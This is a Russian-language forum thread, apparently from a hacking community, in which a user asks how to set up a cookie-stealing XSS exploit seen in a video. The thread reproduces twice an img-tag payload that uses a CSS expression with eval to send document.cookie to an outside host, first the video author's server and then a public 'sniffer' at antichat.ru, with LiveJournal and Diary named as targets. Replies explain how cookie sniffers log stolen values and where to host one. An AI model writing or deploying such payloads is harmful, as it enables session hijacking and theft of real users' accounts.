Видео Zadoxlik'a по XSS
 

Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

Учить js надо.
А нахера на народе?
На народе не получится...

Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?

Да, если можно, то объясните асё по-подробней :)

Никак. Куки пересылаются GET запросом к скрипту, где в QUERY_STRING (строка с параметрами запроса) располагается содержимое куков. Скрипт принимает их и записывает в файл. Т.к. на народе серверные скрипты размещать нельзя, то и сниффер там установить тоже нельзя.

Можеш на Holm.ru сделать себе сниффер
Кроме этого можеш использовать сниффер античата и сделать подписку и все придет тебе на мыло.

Ну раз на народе нельзя, то первое время поюзаю античатовский сниффер. Вот так код верен?

<*img src="http://antichat.ru/sniff/log.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://antichat.ru/sniff/log.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

В ЖЖ сейчас это прикрыли

Ну а сплойт верный? Я ещё может на дайри попробую.

Неверный.